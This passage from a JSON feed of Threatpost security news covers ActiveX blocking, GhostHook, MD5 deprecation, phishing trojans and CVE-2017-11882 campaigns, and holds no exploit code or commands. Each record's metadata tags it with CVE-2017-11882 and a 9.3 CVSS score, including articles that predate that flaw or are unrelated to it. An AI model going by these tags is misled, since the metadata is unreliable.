\u201cIt\u2019s very important that you keep your ActiveX controls up-to-date because malicious or compromised Web pages can target security flaws in outdated controls to collect information, install dangerous software, or let someone else control your computer remotely.\u201d\n\nThe update, called out-of-date ActiveX control blocking, fires off a flag when the browser stops a website from loading an older control, while still allowing a user to interact with the rest of the page that is unaffected by the control. In addition to being able to update the control, IT shops can get an inventory of resident ActiveX controls via a new logging setting in Group Policy, Microsoft said.\n\nThe setting lists ActiveX controls that are permissible or will be blocked.\n\n\u201cCreating an inventory of ActiveX controls can also show which ActiveX controls are compatible with Enhanced Protected Mode, an Internet Explorer 11 security feature which provides additional protection against browser exploits\u2014but not all ActiveX controls are compatible with EPM, so this feature can help assess your organization\u2019s readiness for blocking out-of-date ActiveX controls and enabling EPM,\u201d Microsoft said.\n\nIn all, there are four new Group Policy settings related to the new update, including an enforced blocking setting that denies users the ability to use the \u201cRun This Time\u201d option in the notification. Admins can also create a list of top level domains, host names or files where IE will not block outdated controls. Admins can also disable the feature altogether. The feature will also be off by default in the Local Intranet Zone and Trusted Sites Zone, allowing intranet sites and homegrown apps to run unimpeded inside the firewall.\n\nMicrosoft said next Tuesday\u2019s update will start with blocking older versions of Java, including Java SE 8 prior to update 11, Java SE 7 prior to update 65 and Java 6 prior to update 81. 
The update will be supported only on IE 8-11 on Windows 7 SP1, IE versions supported on Windows 8 and higher, and all Security Zones in the browser.\n\n\u201cWe know that many organizations still rely on the capabilities of ActiveX controls, but out-of-date ActiveX controls are a risk today,\u201d Microsoft said. \u201cBy helping consumers stay up-to-date\u2014and enabling IT to better manage ActiveX controls, including those that are compatible with Enhanced Protected Mode\u2014Microsoft is helping customers stay safer online.\u201d\n\nAs for the regularly scheduled Patch Tuesday security bulletins, two of the nine are rated critical, but three bulletins address remote code execution vulnerabilities. The two critical RCE bugs are in IE and Windows Media Center TV Pack for Vista respectively, while the third, rated important likely because it requires user interaction, is in Office, specifically OneNote 2007, SP 3.\n\nFour other important bulletins address elevation of privilege bugs in Microsoft SQL Server, Windows Server, and Microsoft SharePoint Server 2013.\n\nFinally, two security bypass features are also being patched in the .NET framework and Windows Server.\n", "cvss3": {}, "published": "2014-08-08T11:55:44", "type": "threatpost", "title": "IE to Block Older ActiveX Controls, Starting with Java", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-08T15:55:44", "id": "THREATPOST:AE6ADD184BCB4B6C0DCF53BEE513E9DD", "href": "https://threatpost.com/ie-to-block-older-activex-controls-starting-with-java/107672/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:30", "description": "Microsoft confirmed this week that one of its recent acquisitions, the gaming firm Mojang, has not been hacked.\n\nNearly 2,000 credentials belonging to users of the [Mojang game](<https://mojang.com/games/>) Minecraft \u2013 email addresses and passwords in 
plain-text \u2013 surfaced on Pastebin earlier this week and speculation began to run rampant.\n\nGiven the Swedish video gaming service \u2013 which Microsoft purchased in September \u2013 boasts in excess of 50 million members, many feared the company had been hacked.\n\n[Heise Security](<http://www.heise.de/newsticker/meldung/1800-Minecraft-Accounts-kompromittiert-2520192.html>) reported the breach on Monday, and searched through the list and discovered users from Germany were on it and that the information was current. If a user hasn\u2019t set a security question, attackers could potentially log into one user\u2019s account to another.\n\nMicrosoft\u2019s response however suggests it\u2019s just business as usual for Mojang, who like other gaming firms, get hacked from time to time and are forced to reset a small group of users\u2019 passwords.\n\n\u201cWe can confirm that no Mojang.net service was compromised and that normal industry procedures for dealing with situations like this were put in place to reset passwords for the small number of affected accounts,\u201d a Microsoft spokesperson told Stuart Dredge with _The Guardian_ on Wednesday.\n\nWhile Microsoft didn\u2019t explain exactly how the service\u2019s users were compromised, Owen Hill, the company\u2019s Chief Word Officer suggested that a fraction of Mojang\u2019s users may have been phished.\n\n\u201cNo! We haven\u2019t been hacked. A bunch of bad people have tricked some of our users into disclosing their account information,\u201d Hill wrote in a blog entry titled [Let\u2019s Talk About Password Security](<https://mojang.com/2015/01/lets-talk-about-password-security/>) yesterday.\n\nHill claims the company has already emailed the affected users and reset their passwords. 
To help reinforce security going forward, Hill is encouraging users to reset their passwords, not to use the same password on multiple websites and to avoid giving away account details on sites that aren\u2019t its own.\n\nGamers are routinely targeted by hackers and phishers alike.\n\nEmail addresses, hashed passwords and other information were spilled from the video game developer [Blizzard Entertainment when it was hacked in 2012](<http://threatpost.com/blizzard-sued-over-data-breach-authenticator-sales-111212/77207>) while in 2013 another video game company, [Ubisoft](<http://threatpost.com/ubisoft-urges-password-changes-following-hack/101165>), urged users to create new passwords after hackers were able to exploit a vulnerability to get to one of the company\u2019s databases. Usernames, email addresses and encrypted passwords were leaked in that hack.\n\nLast year, a cache of usernames, email addresses and salted password hashes belonging to players of the popular game [League of Legends](<http://na.leagueoflegends.com/en/news/riot-games/announcements/important-security-update-and-password-reset>) was compromised. 
The service forced users to change their passwords and had to put two new features, email verification and two-factor authentication, into development to bolster security.\n", "cvss3": {}, "published": "2015-01-22T14:35:45", "type": "threatpost", "title": "Mojang Resets Users' Passwords, Microsoft Insists Not a Hack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-01-27T15:10:50", "id": "THREATPOST:4DF584EB3FA47CA6245D964EA2A1A2FB", "href": "https://threatpost.com/following-credential-leak-microsoft-confirms-mojang-not-hacked/110596/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:17", "description": "Microsoft will release on Tuesday guidelines for developers building online applications and for those using the Agile code-development process. The Agile guidelines apply principles from Microsoft\u2019s Security Development Lifecycle (SDL) to Agile, an umbrella term for a development model frequently used for Web-based applications released under short deadlines, called \u201csprints.\u201d [Read the full article](<http://www.computerworld.com/s/article/9140543/Microsoft_to_release_security_guidelines_for_Agile>). 
[Computerworld]\n", "cvss3": {}, "published": "2009-11-09T18:26:11", "type": "threatpost", "title": "Microsoft to Give Security Guidelines for Agile", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:14:29", "id": "THREATPOST:F68D705DC9A7663E4BF22574470F51D7", "href": "https://threatpost.com/microsoft-give-security-guidelines-agile-110909/73057/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:29", "description": "A bypass of PatchGuard kernel protection in Windows 10 has been developed that brings rootkits for the latest version of the OS within reach of attackers.\n\nSince the introduction of PatchGuard and DeviceGuard, very few 64-bit Windows rootkits have been observed; Windows 10\u2019s security, in particular its mitigations against memory-based attacks, are well regarded. Researchers at CyberArk, however, found a way around PatchGuard through a relatively new feature in Intel processors called Processor Trace (Intel PT).\n\nThe bypass, which has been nicknamed [GhostHook](<https://www.cyberark.com/threat-research-blog/ghosthook-bypassing-patchguard-processor-trace-based-hooking/>), is a post-exploitation attack and requires an attacker already be present on a compromised machine and running code in the kernel. As a result, Microsoft said it will not patch the issue, but may address it in a future version of Windows, CyberArk said. ~~A request for comment from Microsoft was not returned in time for publication.~~\n\n\u201cThis technique requires that an attacker has already fully compromised the targeted system. 
We encourage our customers to practice good computing habits online, including exercising caution when clicking on links to web pages, opening unknown files, or accepting file transfers,\u201d a Microsoft representative said in a statement provided to Threatpost.\n\nCyberArk concedes this may be a difficult fix for Microsoft, and said the quickest path to a fix may come from security vendors whose products hook in to PatchGuard. Intel PT, which was released months after PatchGuard, enables security vendors to monitor stacks of commands that are executed in the CPU in order to identify attacks before they reach the operating system.\n\n\u201cWe are able to execute code in the kernel and go unnoticed by any security feature Microsoft produces,\u201d said Kobi Ben Naim, senior director of cyber research. \u201cMany other security vendors rely on PatchGuard and on DeviceGuard in order to receive reliable information and analyze whether it\u2019s benign or an attack. This bypass enables us to go unnoticed versus the security vendors we checked (this includes antimalware, firewalls, host-based intrusion detection and more) that rely on those security layers to provide reliable information.\u201d\n\nNaim said that such an attack is within the realm of a nation-state attacker and that some well known targeted intrusions such as Flame and Shamoon make use of 64-bit malware to establish a foothold on machines and networks. Naim warned as well that if exploit code were to become public and criminal operations were able to execute ransomware through this technique, the results could be \u201ccatastrophic.\u201d\n\nNaim said Microsoft is making a mistake in not addressing this issue sooner.\n\n\u201cWe got an answer from Microsoft saying that because you are already an administrator on the machine, it\u2019s already compromised. But in this case, it\u2019s the wrong answer,\u201d Naim said. 
\u201cAll of those new security layers weren\u2019t designed to combat administrators or code that runs with administrator rights. This is a problematic answer [from Microsoft].\u201d\n\nCyberArk contends that the weakness is in Microsoft\u2019s implementation of Intel PT, specifically at the point where Intel PT talks to the OS.\n\n\u201cThe Intel feature is an API that the kernel code can ask to receive and read information from the CPU. The way that Microsoft implemented this API is the issue we found,\u201d Naim said. \u201cThis enabled us to not only read information but enter our code into a secure location in the kernel.\u201d\n\nAn attacker interacting at that layer can run code of their choosing and do so quietly without being detected by any number of security technology, CyberArk said.\n\n\u201cIt\u2019s very important to say that PatchGuard itself is a very strong mechanism, and the fact is we haven\u2019t seen any rootkits since it was introduced in Windows 10,\u201d Naim said.\n\nCyberArk said it will make enough of its attack public to demonstrate that it\u2019s feasible and enable security vendors to ready patches from their end.\n\nKaspersky Lab released a statement:\n\n> \u201cKaspersky Lab is aware of the hooking technique described by CyberArk researchers, that allows using Intel processor\u2019s feature to circumvent Windows\u2019 security. As conducting such an attack would require that a hacker is already running code in the kernel, this hooking technique doesn\u2019t significantly extend an attack surface.\u201d\n\nNaim said CyberArk has not seen this type of attack in the wild, but believes nation-states are using it.\n\n\u201cWe think attackers are already using it in country- or military-grade malware,\u201d Naim said, adding that by examining research on Flame and Shamoon, nation-states are close to executing against this type of vulnerability.\n\n\u201cWe think it\u2019s pretty critical,\u201d Naim said. 
\u201cThe real impact is if an attacker uses it, they can go uncovered for many months before someone will notice something is wrong. If we can take this capability and add it to ransomware, it would be pretty catastrophic. No player will be able to stop them once they are executing code behind PatchGuard. Today ransomware works in user mode because of PatchGuard. If they were able to execute this code behind PatchGuard, it will be a catastrophic effect.\u201d\n\n_This article was updated June 22 with a comment from Microsoft and Kaspersky Lab._\n", "cvss3": {}, "published": "2017-06-22T11:25:39", "type": "threatpost", "title": "GhostHook Attack Bypasses Windows 10 PatchGuard", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-06-22T19:10:38", "id": "THREATPOST:BDE4A24DFC0713FBC25AB0F17931717C", "href": "https://threatpost.com/ghosthook-attack-bypasses-windows-10-patchguard/126462/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:21", "description": "The clock is running on Windows administrators to sweep out MD5 implementations before a February 2014 patch from Microsoft slams the door shut on the broken, aged crypto algorithm.\n\nMicrosoft released a pair of advisories yesterday in addition to its regular [Patch Tuesday security updates](<http://threatpost.com/microsoft-august-patch-tuesday-addresses-critical-ie-exchange-and-windows-flaws/101981>) alerting users to the fact it would in six months [restrict the use of digital certificates with MD5 hashes](<http://technet.microsoft.com/en-us/security/advisory/2862973>) issued under roots in the Microsoft root certificate program. 
Admins should use the leeway to find any systems or applications relying on MD5 and determine whether the patch will break anything and otherwise impact their environments.\n\nThe second advisory announced the optional availability of network level authentication (NLA) as an authentication method that can be used during [Remote Desktop Protocol sessions](<https://support.microsoft.com/kb/2861855>). [NLA adds a layer of security to RDP sessions](<http://technet.microsoft.com/en-us/library/cc732713.aspx>) by requiring that the user be authenticated to the host server before creation of a session.\n\n\u201cMicrosoft seems to be going after less secure encryption techniques, and that\u2019s a good thing for Microsoft to start eliminating them from the landscape, especially MD5,\u201d said Lamar Bailey, director of security research and development at Tripwire. \u201cI also like the way they are releasing them as optional right now. [The MD5 patch] will be pushed out live in February, so this gives customers a chance to determine if it\u2019s going to break anything.\u201d\n\nWhen the patch is pushed universally in February, [MD5 hashes will no longer be accepted](<http://support.microsoft.com/kb/2862973>) among Microsoft root certificates. The change applies only to certificates used for server authentication, code signing and time stamping, Microsoft said, adding that it would not block other uses of MD5, and that it would allow for signed binaries that were signed before March 2009.\n\nCustomers need to determine, in the meantime, which services are still using MD5 crypto and switch to a stronger algorithm such as the SHA2 family. Weaknesses in MD5 were identified as early as the mid-1990s and research demonstrating collisions was presented in 2004 and 2005. 
In 2008, practical collision attacks, including one where an attacker could spoof a trusted root certificate authority, were also demonstrated, leading CERT late in that year to release a [vulnerability note](<http://www.kb.cert.org/vuls/id/836068>) that sounded the death knell for MD5.\n\nYet, vulnerability scanners and penetration testers continue to find MD5 inside organizations today and flag it for weak cryptography. The problem is that in order for users to change crypto on their servers, they have to manually edit the registry, which can be a chore.\n\n\u201cI\u2019m all for changing it; it should be gone and we see it in customer sites all the time,\u201d Bailey said. \u201cBut we have to make it easier to change it. It\u2019s like if you get a recall notice from a car manufacturer that says \u2018If you have this spark plug, bring your car in for servicing.\u2019 I don\u2019t know what spark plugs my car is running. I have to dive under the cover to figure out if I have what they\u2019re saying is bad.\u201d\n\nExperts say most production servers and webservers hosting production websites are likely not running MD5; it\u2019s second-tier development servers, for example, that were spun up years ago and still store sensitive data that are the outlying issue here\u2014and a tempting target for a hacker. With MD5 broken for so long, enough attacks have been made public and enough advances have been made in processor speeds that cracking MD5 crypto isn\u2019t likely that much of a barrier for an attacker.\n\nRoss Barrett, senior manager of security engineering with Rapid7, said that attackers can use stolen certificates to redirect traffic or inject malware.\n\n\u201cIt\u2019s a bit of a heavy-handed attack to just steal credit cards, but if you have a national security program and you\u2019re sweeping for anyone you can get at, this might justify the cost and effort behind this type of attack,\u201d Barrett said. 
\u201cAny crypto [attack] relies on the complexity of generating the hash versus the difficulty of creating a collision. This can be facilitated as we get more powerful computers and the technology gets stronger to do so. Plus you have a black market industry building computers suited for doing lots of math, like cracking hashes and generating collisions.\u201d\n\nTripwire\u2019s Bailey, for example, estimates that 30 percent of the customers he deals with are still running MD5 somewhere in their environments.\n\n\u201cWe see it with a lot of homegrown systems and apps where the team that worked on it built it years ago and may not be there anymore. They built a custom app running MD5 crypto and said that was good enough because they were internal. Well it\u2019s not.\u201d\n\nThis isn\u2019t Microsoft\u2019s first move against weak cryptographic schemes. Last October, it released a mechanism organizations could use to find RSA certificate key lengths shorter than 1024. In June, anything shorter was considered untrusted and was revoked. Microsoft, in fact, urged customers to move to 2048-bit or higher keys.\n\n\u201cThe test will be for the end user that this is coming and it\u2019s time to get rid of it in the environment,\u201d Bailey said. \u201cAnd Microsoft is testing too whether any of its customers push back and need more time. If February rolls around and it\u2019s not a mandatory update, that\u2019s probably what happened. I don\u2019t remember Microsoft giving customers such a long runway on this kind of change. 
They must think [MD5] is out there more than we do to give customers that long of a runway of time.\u201d\n", "cvss3": {}, "published": "2013-08-14T14:25:38", "type": "threatpost", "title": "Microsoft to Eliminate Weak MD5 Crypto Algorithm", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-16T18:11:59", "id": "THREATPOST:856DD01A5D951BB0E39AE06B64DDD2A7", "href": "https://threatpost.com/microsoft-starts-countdown-on-eliminating-md5/101994/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:00", "description": "Microsoft said it has received 70,000 reports this week of a new Trojan disguised as an Adobe Flash Player update that will change your browser\u2019s home page and redirect a Web session to an attacker\u2019s page.\n\nThere are several clues something is amiss, namely part of the GUI for the supposed Flash 11 update is written in Turkish, and there is no scroll bar on the EULA.\n\nMicrosoft detects the file, which is spreading in emails, as [Trojan:Win32/Preflayer.A](<http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan%3aWin32%2fPreflayer.A>). The malware will change the home page on Internet Explorer, Google Chrome, Mozilla Firefox and Yanex to either anasayfada[.]net or heydex[.]com.\n\n\u201cThese sites appear to be a type of search engine, but there are pop-up advertisements displayed on the pages, and there was an instance where I was redirected to a different page not of my choosing,\u201d said Jonathan Jose, an antivirus researcher at Microsoft.\n\nWhen a victim executes the malicious file, a typical Flash Player dialog box pops up; the text of the agreement isn\u2019t entirely visible because of the lack of a scroll bar. 
Jose said that by highlighting the text, you\u2019re able to read it to the end and notice a condition stating that the user\u2019s home page will be changed.\n\n\u201cNot having a scroll bar is a bit dodgy as most users won\u2019t realize that the program is going to change the browser\u2019s start page,\u201d he said.\n\nShould the user go ahead and click on the install button, written in Turkish, the malware executes and changes the start pages. The domains for the new start pages, as well as the domains hosting the malicious Flash update, were created within the last six months, including one on March 4 that hosts the Flash executable.\n\nJose said that in addition to changing the browser start page, the browser shortcut file may also change to open either of the malicious pages.\n\n\u201cIt\u2019s a fairly simple ruse \u2013 misleading file name, misleading GUI, deliberately inaccessible EULA, misleading file properties \u2013 and some of the files are even signed. And yet, we\u2019ve received over 70,000 reports of this malware in the last week,\u201d he said. \u201cSocial engineering doesn\u2019t have to be particularly sophisticated to be successful. So the message today is be wary. If you think something \u2018feels\u2019 wrong (like that missing scrollbar in the EULA) it may well be. Listen to those feelings and use them to protect yourself by saying \u2018no\u2019 to content you don\u2019t trust.\u201d\n", "cvss3": {}, "published": "2013-03-29T14:05:11", "type": "threatpost", "title": "Has Anyone Seen a Missing Scroll Bar? 
Phony Flash Update Redirects to Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-07T18:30:14", "id": "THREATPOST:D5CE687F92766745C002851DFA8945DE", "href": "https://threatpost.com/has-anyone-seen-missing-scroll-bar-phony-flash-update-redirects-malware-032913/77682/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:59", "description": "There are several ongoing investigations attempting to find the authors of the Conficker botnet, one of the fastest spreading worms in history, but those responsible for the worm have proven elusive. [Read the full article](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1376771,00.html>). [TechTarget]\n", "cvss3": {}, "published": "2009-12-14T18:55:04", "type": "threatpost", "title": "On the Hunt for Conficker", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:54:03", "id": "THREATPOST:051AFF295EB4024C33B9C6988E0F5C34", "href": "https://threatpost.com/hunt-conficker-121409/73256/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:51", "description": "Microsoft is considering adding public-key pinning\u2013an important defense against man-in-the-middle attacks\u2013to Internet Explorer.\n\nThe feature is designed to help protect users against the types of MITM attacks that rely on forged certificates, which comprise a large portion of those attacks. Attackers use forged or stolen certificates to trick victims\u2019 browsers into trusting a malicious site that the attacker controls. Public-key pinning helps prevent those attacks by binding a set of public keys issued by a trusted certificate authority to a specific domain. 
With that defense in place, if the user visits the site and is presented with a key that\u2019s not part of the pinned set, the browser will reject the secure connection.\n\nPublic-key pinning as an extension to HTTP is laid out in an Internet-Draft submitted to the IETF by a group of Google security engineers in October. The [draft](<http://tools.ietf.org/html/draft-ietf-websec-key-pinning-21>) makes it clear that in order for the system to work, site operators must be up to the task.\n\n\u201cDeploying PKP safely will require operational and organizational maturity due to the risk that hosts may make themselves unavailable by pinning to a (set of) SPKI(s) that becomes invalid. With care, host operators can greatly reduce the risk of man-in-the-middle (MITM) attacks and other false-authentication problems for their users without incurring undue risk,\u201d the specification says.\n\nBut in order for the system to work, browsers must support it, as well. Google Chrome already ships with public-key pinning support, and Mozilla Firefox 32, which debuted in September, also includes the feature. Now, Microsoft has public-key pinning [under consideration](<https://status.modern.ie/publickeypinningextensionforhttp>) for inclusion in Internet Explorer, too.\n\nMITM attacks come in a variety of flavors, but one of the key components in many of them is the use of a forged certificate. In order to fool a user\u2019s browser into trusting a site that the attacker controls, the attacker can present a stolen or forged certificate for the site. This happens fairly regularly, and the technique has come up in some high-profile attacks in the last few years. 
In 2011, an attacker [compromised Dutch CA DigiNotar](<https://threatpost.com/what-you-need-know-about-diginotar-hack-090211>) and issued himself valid certificates for a number of high-value domains, including those belonging to Google, Yahoo and Mozilla.\n\nEarlier that same year, an attacker\u2013who may have been the same one to compromise DigiNotar\u2013[penetrated Comodo](<https://threatpost.com/phony-ssl-certificates-issued-google-yahoo-skype-others-032311>), another CA, and pulled the same stunt, issuing certificates for Mozilla, Skype and Yahoo domains. The public-key pinning mechanism has the potential to defeat the attacks that result from these kinds of CA compromises by locking in a known-good set of keys for a given domain.\n", "cvss3": {}, "published": "2014-11-14T07:42:48", "type": "threatpost", "title": "Microsoft Considering Public-Key Pinning for Internet Explorer", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-18T12:09:37", "id": "THREATPOST:195656DFCDBB1B18C4B0E899AA2C96DE", "href": "https://threatpost.com/microsoft-considering-public-key-pinning-for-internet-explorer/109365/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:27", "description": "Microsoft has patched a serious vulnerability in the Windows TCP/IP stack that, under some conditions, could enable an attacker to run code on remote machines. The flaw lies in the way that the stack handles large amounts of specially formatted packets sent to a vulnerable machine.\n\nMicrosoft officials said that the vulnerability, which is one of a handful of flaws fixed by the company in November\u2019s Patch Tuesday release, is a serious one, but that the scenarios in which it can be exploited for remote code execution are limited. 
The vulnerability crops up when an attacker sends a large volume of crafted UDP packets to a machine on a port that doesn\u2019t have any service listening on it.\n\n\u201cWhile processing these network packets it is observed that some used structures are referenced but not dereferenced properly. This unbalanced reference counting could eventually lead to an integer overflow of the reference counter,\u201d [Microsoft\u2019s SWIAT team](<https://threatpost.com/microsoft-patches-critical-bug-windows-tcpip-stack-110911/>) said in a blog post on the vulnerability.\n\nIn order for the bug to be exploitable, some specific conditions need to be present. If a dereference happens immediately after the counter has gone back to zero, Windows will free the structure. If that happens, there are four things that can occur, Microsoft said: \n\u2022 The memory is still mapped and contains the old data. No crash results and the system works as normal. \n\u2022 The memory is unmapped and the system crashes when it is referenced. This results in a system denial-of-service. \n\u2022 The memory is re-allocated for the same structure. No crash results and the system works as normal. \n\u2022 The memory is re-allocated for a different structure. 
This could result in a system crash, or if attacker-controlled data is present, could lead to memory corruption or remote code execution.\n\nThe last scenario in the list is the one that could lead to remote code execution, the company said.\n\n\u201cWhile the last scenario can theoretically lead to RCE, we believe it is difficult to achieve RCE using this vulnerability considering that the type of network packets required are normally filtered at the perimeter and the small timing window between the release and next access of the structure, and a large number of packets are required to pull off the attack,\u201d Microsoft\u2019s team said.\n", "cvss3": {}, "published": "2011-11-09T15:20:26", "type": "threatpost", "title": "Microsoft Patches Critical Bug in Windows TCP/IP Stack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:23", "id": "THREATPOST:F73CA4042B0D13ED4A29DED46F90E099", "href": "https://threatpost.com/microsoft-patches-critical-bug-windows-tcpip-stack-110911/75872/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-11T11:45:33", "description": "Microsoft is warning of a fresh email campaign that distributes malicious RTF files boobytrapped with an exploit dating back to a 2017 vulnerability, [CVE-2017-11882](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>).\n\nThe exploit allows attackers to automatically run malicious code without requiring user interaction.\n\n\u201cThe CVE-2017-11882 vulnerability was fixed in 2017, but to this day, we still observe the exploit in attacks,\u201d Microsoft Security Intelligence tweeted on Friday. \u201cNotably, we saw increased activity in the past few weeks. 
We strongly recommend applying security updates.\u201d\n\n> An active malware campaign using emails in European languages distributes RTF files that carry the CVE-2017-11882 exploit, which allows attackers to automatically run malicious code without requiring user interaction. [pic.twitter.com/Ac6dYG9vvw](<https://t.co/Ac6dYG9vvw>)\n> \n> \u2014 Microsoft Security Intelligence (@MsftSecIntel) [June 7, 2019](<https://twitter.com/MsftSecIntel/status/1137118977983897600?ref_src=twsrc%5Etfw>)\n\nThe flaw is a stack-based overflow bug in Microsoft Equation Editor.\n\n\u201cThe security flaw affected all versions of Microsoft Office, Microsoft Windows and architecture types dating back to 2000,\u201d Tripwire explained in [a write-up](<https://www.tripwire.com/state-of-security/latest-security-news/microsoft-warns-of-malspam-campaign-abusing-office-vulnerability-to-distribute-backdoor/>), posted Monday. \u201cThe security weakness enables a bad actor to execute arbitrary code on a vulnerable machine. In [an] analysis, for instance, researchers found a digital attacker could easily launch a file from the WebDAV server under their control as well as use an OLE auto-update to exploit the flaw without any user interaction.\u201d\n\nIn this current wave of attacks targets receive an email in one of several European languages. If the recipient falls for the lure and clicks on the RTF file, it downloads and runs multiple scripts of different types (VBScript, PowerShell, PHP, others) which in turn download a backdoor payload. The backdoor payload then tries to connect to command-and-control server (which was down at the time of Microsoft Security Intelligence\u2019s warning).\n\nThe same bug was at the heart of a campaign in late 2018 and early 2019 that distributed the most recent version of the .Hawkeye keylogger. 
Emails arrived with malicious Microsoft Excel, RTF and Doc attachments loaded with an exploit for the arbitrary code-execution bug.\n\nOnce a victim clicked on the attachment, the contents of the document appeared blurry (the email senders had intentionally made them so), and the user was prompted to enable editing to have a clearer view of the contents. After they did that, the injection process began, with the HawkEye keylogger being downloaded. The malware then snatched up sensitive information, such as the system information, passwords from common web browsers, clipboard contents, desktop screenshots, webcam pictures and account credentials.\n\nCybercriminals using older bugs is a clear indicator that better patching habits are in order: \u201cThe fact that digital attacks continue to leverage exploit code for old vulnerabilities like CVE-2017-11882 highlights [the need for organizations to keep their software up-to-date](<https://threatpost.com/threatlist-financial-services-firms-lag-in-patching-habits/134750/>) by investing in their vulnerability management capabilities,\u201d noted Tripwire.\n", 
"cvss3": {}, "published": "2019-06-10T16:10:04", "type": "threatpost", "title": "Microsoft Warns of Email Attacks Executing Code Using an Old Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2019-06-10T16:10:04", "id": "THREATPOST:EE5FF4DE95B4AED68C90DCB6444B6560", "href": "https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:34", "description": "Researchers are warning of several recent spam campaigns delivering PowerPoint files that when opened contain a mouseover link that installs a variant of the Zusy malware.\n\nThe malware is novel because it does not rely on macros, JavaScript or VBA being enabled for the dropper file to download the malware payload. Instances of the malware are relatively few, according to researchers who attribute the small infection numbers to the fact that recent versions of Microsoft Office warn users that booby-trapped files could be malicious.\n\nVictims must first open the PowerPoint file to become infected; once opened, a \u201cLoading\u2026 Please wait\u201d hypertext message appears. 
If a user hovers over those words it triggers an infection chain that delivers the Zusy malware payload.\n\n\u201cWhen the user mouses over the text (which is the most common way users would check a hyperlink) it results in PowerPoint executing PowerShell,\u201d wrote Ruben Dodge, a cyber intelligence analyst in a [blog post last week](<https://www.dodgethissecurity.com/2017/06/02/new-powerpoint-mouseover-based-downloader-analysis-results/>).\n\nKevin Epstein, VP of Threat Operations at Proofpoint said the approach is new when it comes to user-triggered malware downloads. \u201cThis technique was just introduced, so there will likely be a few users caught unaware,\u201d he said.\n\nAccording to several security firms tracking the malware, Zusy is currently being spread via spam campaigns with subject lines like \u201cPurchase Order #130527\u201d and \u201cConfirmation.\u201d The name of the PowerPoint file varies from \u201corder.ppsx\u201d, \u201cinvoice.ppsx\u201d or \u201corder&prsn.ppsx.\u201d\n\nThe technical aspect of the mouseover technique includes an \u201celement definition for a hover action\u201d in the hypertext phrase \u201cLoading\u2026 Please wait\u201d embedded in the first slide of the PowerPoint file, according to Dodge. 
By hovering over the hyperlink, a PowerShell module is instructed to visit a URL and fetch a malware downloader that\u2019s saved to the target\u2019s Temp folder, according to the researcher.\n\nThe final stage includes the execution of the JScript Encoded Script file (ii.jse) that pulls down the Zusy payload.\n\nIf Office 2013 or Office 2010 has the Protected View security feature enabled, users will receive a warning: \u201cMicrosoft Office has identified a potential security concern.\u201d Users are then prompted to choose \u201cEnable All,\u201d \u201cEnable\u201d or \u201cDisable.\u201d\n\n\u201cIt is a technique blocked by default, caught by most antivirus programs, and easily detected as an attachment type,\u201d Epstein said. \u201cIt seems unlikely to prove as rapid to spread as other recent malware distribution approaches.\u201d\n\nVariants of the Zusy malware have been around for years. Early incarnations of Zusy took the form of adware. Later versions of Zusy have been updated with a spyware component used to steal information from businesses, according to researchers.\n", "cvss3": {}, "published": "2017-06-07T14:36:01", "type": "threatpost", "title": "Zusy Malware Installs Via Mouseover \u2013 No Clicking Required", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-06-19T12:40:15", "id": "THREATPOST:28E43852D5120A3EC8F4720244E0C432", "href": "https://threatpost.com/zusy-malware-installs-via-mouseover-no-clicking-required/126122/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:39", "description": "Mark Dowd, fresh off his [2017 Security Analyst Summit keynote](<https://threatpost.com/memory-corruption-mitigations-doing-their-job/124728/>), discusses why certain 